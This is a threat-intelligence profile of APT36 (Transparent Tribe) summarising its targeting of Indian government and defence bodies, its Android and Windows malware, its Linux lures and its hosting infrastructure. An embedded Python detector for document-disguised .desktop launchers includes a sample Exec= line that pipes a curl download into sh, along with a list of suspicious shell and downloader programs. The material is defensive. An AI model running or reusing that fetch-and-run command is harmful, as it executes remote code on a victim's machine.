APT36

Threat Actor updated 25 days ago (2024-08-14T09:48:20.905Z)
APT36, also known as Transparent Tribe and Earth Karkaddan, is a threat actor group that has historically targeted government agencies and defense firms in India, compromising both Windows systems and Android devices. Its activities have been tracked by several security vendors, including Cisco Talos and Zscaler. APT36 has used romance-scam lures to distribute the CapraRAT Android malware to Indian government officials, using content about the Kashmir region as bait. The group has also expanded into sectors such as education, broadening its focus beyond traditional governmental and military targets.

Transparent Tribe has been linked to the use of XploitSPY, a widely available Android spyware tool that multiple threat actors have customized. The modifications in the apps used by APT36 as part of the eXotic Visit campaign are, however, distinct from previously documented XploitSPY variants.

The group has also been observed weaponizing legitimate tools and services as part of its attack infrastructure, extending the living-off-the-land trend. According to BlackBerry, this includes the use of ISO images against Windows systems, which began towards the end of 2023. In a notable shift in tactics, Transparent Tribe has started targeting Linux systems with a desktop entry file (an XDG .desktop launcher) disguised as a Microsoft Office document; this vector was first documented by Zscaler in September 2023. Although not considered highly sophisticated, Transparent Tribe has had success by diversifying its tactics.

All three sets of domains, namely the malicious Transparent Tribe infrastructure, vebhost[.]com, and zainhosting[.]net/com, are related: "ZainHosting" owns and operates the malicious infrastructure. These domains have been used to register, renew, and administer several malicious web pages over time, including those used by the Transparent Tribe APT in its most recent campaigns.
Description last updated: 2024-08-14T09:04:23.789Z
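The Linux desktop-entry lure described above, as an added detection example (not code from this profile or from Zscaler or BlackBerry): a .desktop file is an INI-style launcher whose Name= and Icon= lines control what the file manager shows, while Exec= is what actually runs on double-click. The script parses such a file and flags a launcher that presents itself as a document but whose Exec= invokes a shell, interpreter or downloader. The two sample entries are constructed for the example, and the document hints and suspicious-binary list are assumptions to tune for your environment rather than vendor indicators.

```python
"""Flag Linux .desktop launchers that pose as documents (added example)."""
import configparser
import os
import re
import shlex

# Assumption: substrings in Name=/Icon= that suggest a document rather than an application.
DOCUMENT_HINTS = ("office", "msword", "ms-word", "pdf", "document", "x-office")
DOCUMENT_EXTS = (".docx", ".doc", ".xlsx", ".xls", ".pptx", ".pdf")
# Assumption: programs a genuine document shortcut has no reason to invoke.
SUSPICIOUS_BINS = {"sh", "bash", "dash", "zsh", "python", "python3", "perl",
                   "curl", "wget", "nc", "base64", "chmod"}


def parse_desktop(text):
    """Return the [Desktop Entry] section as a dict, or None if the text is not a launcher."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keep key case (Name, Exec) exactly as written in the file
    try:
        cp.read_string(text)
    except configparser.Error:  # e.g. no section header at all
        return None
    if "Desktop Entry" not in cp:
        return None
    return dict(cp["Desktop Entry"])


def exec_binaries(exec_line):
    """Every command word reachable from Exec=, including those inside sh -c "a | b; c"."""
    try:
        tokens = shlex.split(exec_line)
    except ValueError:  # unbalanced quotes: fall back to a plain whitespace split
        tokens = exec_line.split()
    bins = set()
    for token in tokens:
        # A quoted script passed to -c still contains pipelines and separators: split them too.
        for part in re.split(r"[|;&]+", token):
            words = part.split()
            if words:
                bins.add(os.path.basename(words[0]))
    return bins


def assess(text):
    """Classify one .desktop file: masquerade flag, human-readable reasons, binaries seen."""
    entry = parse_desktop(text)
    if entry is None:
        return {"masquerade": False, "reasons": ["not a desktop entry"], "binaries": []}
    name = entry.get("Name", "").lower()
    icon = entry.get("Icon", "").lower()
    exec_line = entry.get("Exec", "")
    looks_like_document = name.endswith(DOCUMENT_EXTS) or any(
        h in name or h in icon for h in DOCUMENT_HINTS)
    bins = exec_binaries(exec_line)
    reasons = []
    if looks_like_document:
        bad = sorted(bins & SUSPICIOUS_BINS)
        if bad:
            reasons.append("document-looking launcher executes " + ", ".join(bad))
        if re.search(r"https?://", exec_line):
            reasons.append("Exec= contains a URL")
    return {"masquerade": bool(reasons), "reasons": reasons, "binaries": sorted(bins)}


# Constructed samples for this example, not files recovered from the campaign.
BENIGN = """[Desktop Entry]
Type=Application
Name=LibreOffice Writer
Icon=libreoffice-writer
Exec=libreoffice --writer %U
Terminal=false
"""

MASQUERADE = """[Desktop Entry]
Type=Application
Name=Meeting_Agenda.docx
Icon=x-office-document
Exec=sh -c "curl -fsSL http://example.invalid/stage | sh; xdg-open decoy.docx"
Terminal=false
"""

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("masquerade", MASQUERADE)):
        print(label, assess(sample))
```

Run it over ~/.local/share/applications, ~/Desktop and any .desktop file found in mail attachments or download directories; the masquerade entry above trips on both the shell/downloader call and the embedded URL, while the genuine LibreOffice shortcut (which also matches the "office" hint) produces no reasons because its Exec= only launches the office binary.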
Possible Aliases / Cluster overlaps
It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at.
Transparent Tribe (4 votes): Transparent Tribe is a threat actor known for conducting malicious campaigns against organizations in South Asia. The group has been linked to the ObliqueRAT malware and CrimsonRAT through its infrastructure, which includes the domains vebhost[.]com, zainhosting[.]net/com, and others. The group has
SideCopy (3 votes): SideCopy is a Pakistani threat actor that has been operational since at least 2019, primarily targeting South Asian countries, specifically India and Afghanistan. The Advanced Persistent Threat (APT) group uses lures such as archive files embedded with Lnk, Microsoft Publisher or Trojanized Applicat
Sidewinder (3 votes): Sidewinder is a threat actor group that has been active since at least 2012, with possible origins in South Asia. The group has a history of malicious activities and has been linked to a variety of cyber threats, including the use of the Nim backdoor payload. Sidewinder has targeted entities in mult
Mythic Leopard (2 votes): Mythic Leopard, also known as Transparent Tribe, APT36, and ProjectM, is a threat actor group likely fulfilling strategic intelligence requirements for the Pakistani state. This highly prolific group's activities date back to at least 2013 and primarily involve the creation of fake domains that mimi
ProjectM (2 votes): ProjectM, also known as Transparent Tribe, APT36, Copper Fieldstone, and Mythic Leopard, is a threat actor group originating from Pakistan that has been active since 2013. The group has targeted Indian governmental, military, and research organizations, along with their employees, using a variety of
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
APT, Malware, Android, RAT, Trojan, Phishing, Windows, Spyware, Linux, YouTube, Backdoor, Pakistan, Espionage, Scams
Associated Malware
Crimson (type unspecified, 4 votes): Crimson is a type of malware that has been used in various cyber-espionage campaigns, notably by ProjectM. The malware was first observed in 2013 and has been continuously employed in attacks alongside other payloads like Capra RAT and Oblique RAT. ProjectM used multiple domains to control the Crims
Crimson RAT (type unspecified, 3 votes): Crimson RAT is a malicious software, or malware, primarily used by the threat actor known as APT36 or Transparent Tribe. This custom .NET Remote Access Trojan (RAT) has been observed in multiple instances of cyber-attacks, mainly targeting India and Afghanistan. Over time, alongside Crimson RAT, Tra
Source Document References
Information about the APT36 Threat Actor was read from the documents in the corpus below (display limited to 20 results).
DARKReading (3 months ago): Pakistani 'Transparent Tribe' APT Aims for Cross-Platform Impact
Securityaffairs (2 months ago): Security Affairs newsletter Round 479 by Pierluigi Paganini – INTERNATIONAL EDITION
BankInfoSecurity (3 months ago): Pakistan's 'Cosmic Leopard' Is Targeting India With RATs
DARKReading (3 months ago): Pakistani APT 'Celestial Force' Spies on Indian Gov't, Defense Orgs
BankInfoSecurity (4 months ago): Pakistani-Aligned APT36 Targets Indian Defense Organizations
ESET (5 months ago): eXotic Visit campaign: Tracing the footprints of Virtual Invaders
CERT-EU (6 months ago): 12 Months of Fighting Cybercrime & Defending Enterprises | #cybercrime | #infosec | National Cyber Security Consulting
CERT-EU (9 months ago): Operation RusticWeb: Rust-Based Malware Targets Indian Government Entities
CERT-EU (10 months ago): SideCopy’s Multi-platform Onslaught: Leveraging WinRAR Zero-Day and Linux Variant of Ares RAT
CERT-EU (10 months ago): DoNot Team's New Firebird Backdoor Hits Pakistan and Afghanistan
CERT-EU (a year ago): Cyber Security Week in Review: September 22, 2023
CERT-EU (a year ago): Fake YouTube Android Apps Used to Distribute CapraRAT
CERT-EU (a year ago): Second highest ransomware profits expected this year
CERT-EU (a year ago): Fake YouTube apps leveraged for CapraRAT malware distribution
CERT-EU (a year ago): Chinese cyberespionage campaign involves novel Linux backdoor
CERT-EU (a year ago): Hackers Using Fake YouTube Apps To Infect Android Devices
CERT-EU (a year ago): CapraTube - Transparent Tribe's CapraRAT mimics YouTube to hijack Android phones – Global Security Mag Online
DARKReading (a year ago): CapraRAT Impersonates YouTube to Hijack Android Devices
CERT-EU (a year ago): CapraTube | Transparent Tribe’s CapraRAT Mimics YouTube to Hijack Android Phones
CERT-EU (a year ago): APT36 state hackers infect Android devices using YouTube app clones